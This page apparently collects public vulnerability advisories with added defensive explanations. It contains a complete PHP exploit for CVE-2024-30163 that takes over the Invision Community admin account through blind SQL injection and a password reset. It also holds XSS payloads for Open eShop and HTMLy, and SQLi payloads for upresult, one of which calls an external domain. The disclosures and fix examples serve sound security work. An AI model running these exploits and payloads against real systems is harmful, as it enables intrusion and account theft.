<pre><code>--------------------------------------------------------------------<br />Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability<br />--------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://invisioncommunity.com<br /><br /><br />[-] Affected Versions:<br /><br />All versions from 4.4.0 to 4.7.15.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the<br />/applications/nexus/modules/front/store/store.php script. Specifically, in the<br />IPS\nexus\modules\front\store\_store::_categoryView() method:<br /><br />126         /* Apply Filters */<br />127         if ( isset( \IPS\Request::i()->filter ) and \is_array( \IPS\Request::i()->filter ) )<br />128         {<br />129             $url = $url->setQueryString( 'filter', \IPS\Request::i()->filter );<br />130             foreach ( \IPS\Request::i()->filter as $filterId => $allowedValues )<br />131             {<br />132                 $where[] = array( \IPS\Db::i()->findInSet( "filter{$filterId}.pfm_values", array_map( 'intval', explode( ',', $allowedValues ) ) ) );<br />133                 $joins[] = array( 'table' => array( 'nexus_package_filters_map', "filter{$filterId}" ), 'on' => array( "filter{$filterId}.pfm_package=p_id AND filter{$filterId}.pfm_filter=?", $filterId ) );<br />134             }<br />135         }<br /><br />User input passed through the "filter" request parameter is not properly<br />sanitized before being assigned to the $where and $joins variables (lines 132<br />and 133), which are later used to execute some SQL queries. This can be<br />exploited by unauthenticated attackers to carry out time-based or error-based<br />Blind SQL Injection attacks. Subsequently, this might also be exploited to reset<br />users' passwords and gain unauthorized access to the AdminCP, in order to<br />achieve Remote Code Execution (RCE). Successful exploitation of this<br />vulnerability requires the nexus application to be installed and configured<br />with at least one "Product Group".<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2024-30163.php<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 4.7.16 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure<br />[12/03/2024] - Version 4.7.16 released<br />[20/03/2024] - CVE identifier requested<br />[24/03/2024] - CVE identifier assigned<br />[05/04/2024] - Coordinated public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2024-30163 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://invisioncommunity.com/release-notes/4716-r128/<br />https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2024-02<br /><br /><br />-----------------------<br />PoC:<br /><br />&lt;?php<br /><br />/*<br /> --------------------------------------------------------------------<br /> Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability<br /> --------------------------------------------------------------------<br /><br /> author..............: Egidio Romano aka EgiX<br /> mail................: n0b0d13s[at]gmail[dot]com<br /> software link.......: https://invisioncommunity.com<br /><br /> +-------------------------------------------------------------------------+<br /> | This proof of concept code was written for educational purpose only. |<br /> | Use it at your own risk. Author will not be responsible for any damage. |<br /> +-------------------------------------------------------------------------+<br /><br /> [-] Vulnerability Description:<br /><br /> The vulnerability is located in the /applications/nexus/modules/front/store/store.php script.<br /> Specifically, in the IPS\nexus\modules\front\store\_store::_categoryView() method: user<br /> input passed through the "filter" request parameter is not properly sanitized before being<br /> assigned to the $where and $joins variables, which are later used to execute some SQL<br /> queries. This can be exploited by unauthenticated attackers to carry out time-based<br /> or error-based SQL Injection attacks.<br /><br /> [-] Original Advisory:<br /><br /> https://karmainsecurity.com/KIS-2024-02<br />*/<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[-] cURL extension required!\n");<br /><br />if ($argc != 2) die("\nUsage: php $argv[0] &lt;URL&gt;\n\n");<br /><br />$url = $argv[1];<br />$ch = curl_init();<br />$sec = 3; // number of seconds for SLEEP(): less seconds, less accurate<br /><br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/store/");<br /><br />// Extracts the result of $sql one character at a time via a time-based binary search<br />function sql_injection($sql)<br />{<br />    global $ch, $sec;<br /><br />    $data = ''; // accumulated result<br />    $min = true;<br />    $idx = 1;<br /><br />    while(1)<br />    {<br />        $test = 256;<br /><br />        for ($i = 7; $i >= 0; $i--)<br />        {<br />            $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));<br />            $injection = "` ON 1 UNION SELECT IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},1,SLEEP({$sec})) OR ?=?#";<br />            curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf("cat=1&filter[%s]=1", rawurlencode($injection)));<br />            $start = time(); curl_exec($ch); $secs = time() - $start;<br />            $min = ($secs < $sec);<br />        }<br /><br />        if (($chr = $min ? ($test - 1) : ($test)) == 0) break;<br />        $data .= chr($chr); $min = true; $idx++;<br />        print "\r[*] Data: {$data}";<br />    }<br /><br />    return $data;<br />}<br /><br />print "[+] Step 1: fetching admin's e-mail address\n";<br /><br />$email = sql_injection("SELECT email FROM core_members WHERE member_id=1");<br /><br />print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";<br /><br />fgets(STDIN);<br /><br />print "[+] Step 3: fetching the password reset key\n";<br /><br />$vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");<br /><br />print "\n[+] Step 4: taking over the admin account by resetting their password\n";<br /><br />@unlink('./cookies.txt');<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");<br />curl_setopt($ch, CURLOPT_POST, false);<br />curl_setopt($ch, CURLOPT_HEADER, true);<br />curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');<br />curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');<br /><br />if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");<br /><br />$passwd = md5(time());<br />$params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";<br /><br />curl_setopt($ch, CURLOPT_POSTFIELDS, $params);<br /><br />if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");<br /><br />print "[+] Done! You can log into the AdminCP with {$email}:{$passwd}\n";<br /><br /></code></pre>
<pre><code># Exploit Title: Open eShop Version : 2.7.0 - Reflected XSS<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: http://www.open-eshop.com/<br /># Version : 2.7.0<br /># Date : 04/08/2024<br /><br />1 ) Go to the home page https://127.0.0.1/Open_eShop<br />2 ) Place this payload in the URL : test.html"><img src=x onerrora=confirm() onerror=confirm(1)><br /><br />3 ) After you save it you will see the XSS alert<br /><br />https://127.0.0.1/Open_eShop/test.html"><img src=x onerrora=confirm() onerror=confirm(1)><br /><br /></code></pre>
<pre><code># Exploit Title: HTMLy Version : 2.9.6 - Stored XSS<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.htmly.com/<br /># Version 3.10.8.21<br /># Date : 04/08/2024<br /><br />1 ) Log in as admin at https://127.0.0.1/HTMLy/admin/config<br />2 ) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)><br />3 ) After you save it you will see the XSS alert<br /><br /></code></pre>
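The two XSS reports above (the reflected one in Open eShop and the stored one in HTMLy's blog title) are the same defect seen twice: a string that came from the request or from the database is written into HTML without encoding for the context it lands in. The following is an added example, not code from either project or either advisory's author, showing the vulnerable rendering next to the hardened form; the function names and markup are hypothetical, and the only input it uses is the payload string already quoted in the reports.

```php
<?php
declare(strict_types=1);
// Added example: output encoding at the point where untrusted text meets HTML.
// Not HTMLy's or Open eShop's code; renderTitleUnsafe/renderTitleSafe/renderNotFound
// are hypothetical names standing in for whatever template emits the value.

/** Encode a string for an HTML text node or a double-quoted attribute value. */
function h(string $s): string
{
    // ENT_QUOTES also encodes single quotes; ENT_SUBSTITUTE replaces invalid
    // UTF-8 instead of returning "", which would silently drop the value.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable rendering: the stored title is interpolated straight into an attribute. */
function renderTitleUnsafe(string $title): string
{
    return "<input name=\"title\" value=\"{$title}\">";
}

/** Hardened rendering: same markup, value encoded for the attribute context. */
function renderTitleSafe(string $title): string
{
    return '<input name="title" value="' . h($title) . '">';
}

/**
 * The reflected case: a request path echoed back into the page body.
 * Same encoder, because the value is text, never markup. Note that h() is the
 * right tool only for element content and quoted attributes; a value placed
 * inside <script> or into a URL/href attribute needs its own context-specific
 * encoding, which this example does not cover.
 */
function renderNotFound(string $path): string
{
    return '<p>Page ' . h($path) . ' was not found.</p>';
}

// Constructed sample input: the payload quoted in the reports above.
$payload = '"><img src=x onerrora=confirm() onerror=confirm(1)>';

echo renderTitleUnsafe($payload), PHP_EOL;
// <input name="title" value=""><img src=x onerrora=confirm() onerror=confirm(1)>">
//   the attribute closes early and a new <img> element with an event handler appears

echo renderTitleSafe($payload), PHP_EOL;
// <input name="title" value="&quot;&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt;">
//   the browser shows the literal text; no element or handler is created

echo renderNotFound('/Open_eShop/' . $payload), PHP_EOL;
// <p>Page /Open_eShop/&quot;&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt; was not found.</p>
```

Encoding is applied at output rather than at storage time so the same stored title can later be emitted into JSON, a feed or an e-mail with the encoding each of those contexts needs; storing a pre-encoded string leads to double encoding in one place and none in another.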
<pre><code>## Title: upresult_0.1-2024 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 04/08/2024<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The nid parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'<br />was submitted in the nid parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed.<br />The attacker can get all information from the system by using this<br />vulnerability!<br /><br />STATUS: HIGH - Vulnerability<br /><br />[+] Payload:<br />```mysql<br />---<br />Parameter: nid (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM (SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/upresult_0.1-2024)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/04/upresult01-2024-multiple-sqli.html)<br /><br />## Time spent:<br />00:15:00<br /><br /><br /></code></pre>
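The two SQL injection reports on this page show request input reaching SQL in two different positions: in the Invision Community advisory the attacker controls an identifier (the key of the "filter[...]" array, spliced into the WHERE/JOIN text), and in the upresult report the attacker controls a value (the "nid" parameter). The distinction matters for the fix, because an identifier cannot be bound as a query parameter and has to be allow-listed, while a value is bound. The following is an added example, not code from Invision Community, upresult or either advisory's author; the table and column names are hypothetical, the rows are constructed, and the only attacker-shaped inputs it uses are strings already quoted in the reports.

```php
<?php
declare(strict_types=1);
// Added defensive example (not code from Invision Community, upresult or the
// advisory authors). Table/column names are hypothetical; rows are constructed.

// Allow-list of column names a client may filter on. This is the only way to
// let a request choose an identifier: compare against known names, never
// interpolate the request string.
const FILTERABLE_COLUMNS = ['price', 'stock'];

/**
 * Build a category listing from untrusted $filters (shaped like $_POST['filter']).
 * Returns [sql, params]. Any key outside the allow-list is refused before any
 * SQL text is assembled, which is the case the Invision advisory describes.
 */
function buildFilterQuery(array $filters, int $categoryId): array
{
    $where  = ['category_id = :cat'];
    $params = [':cat' => $categoryId];

    foreach ($filters as $column => $value) {
        if (!in_array($column, FILTERABLE_COLUMNS, true)) {
            // Do not echo the rejected key back to the client; it is untrusted input.
            throw new InvalidArgumentException('unknown filter column');
        }
        $placeholder = ':f_' . $column;          // $column is now a known-safe literal
        $where[] = "{$column} = {$placeholder}";
        $params[$placeholder] = (string) $value; // the value is bound, never concatenated
    }

    return ['SELECT id, name FROM products WHERE ' . implode(' AND ', $where), $params];
}

/** Look up one record by an id that arrived as a string (e.g. $_GET['nid']). */
function fetchResultById(PDO $pdo, string $nid): ?array
{
    // Reject anything that is not a plain integer before it goes near SQL.
    if (!ctype_digit($nid)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, student FROM results WHERE id = :id');
    $stmt->bindValue(':id', (int) $nid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demonstration against an in-memory SQLite database with constructed rows.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE results (id INTEGER PRIMARY KEY, student TEXT)');
$pdo->exec("INSERT INTO results VALUES (1, 'alice'), (2, 'bob')");
$pdo->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, category_id INTEGER, price INTEGER, stock INTEGER)');
$pdo->exec("INSERT INTO products VALUES (1, 'pen', 1, 10, 5), (2, 'ink', 1, 25, 0)");

// The nid value from the upresult report is rejected outright; a real id works.
var_dump(fetchResultById($pdo, "145448807' or '1766'='1766"));   // NULL
var_dump(fetchResultById($pdo, '2'));                            // id 2, student "bob"

// A filter key shaped like the Invision payload is refused before any SQL exists.
try {
    buildFilterQuery(['` ON 1 UNION SELECT 1#' => '1'], 1);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// A legitimate filter builds a parameterised query and runs it.
[$sql, $params] = buildFilterQuery(['price' => '10'], 1);
echo $sql, PHP_EOL;   // SELECT id, name FROM products WHERE category_id = :cat AND price = :f_price
$stmt = $pdo->prepare($sql);
$stmt->execute($params);
var_dump($stmt->fetchAll(PDO::FETCH_ASSOC));   // one row: pen
```

Two points worth noting for review of similar code: the allow-list check uses strict comparison so that numeric-looking keys are not coerced, and the rejected key is deliberately kept out of the error message, since an error page that reflects it would turn a blocked injection attempt into a reflected XSS of the kind the other reports on this page describe.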